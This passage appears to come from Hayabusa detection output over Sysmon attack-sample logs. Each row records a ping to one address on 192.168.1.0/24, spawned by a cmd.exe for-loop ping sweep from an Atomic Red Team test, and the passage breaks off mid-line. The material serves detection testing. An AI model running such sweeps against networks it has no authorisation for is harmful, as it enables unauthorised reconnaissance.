+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping 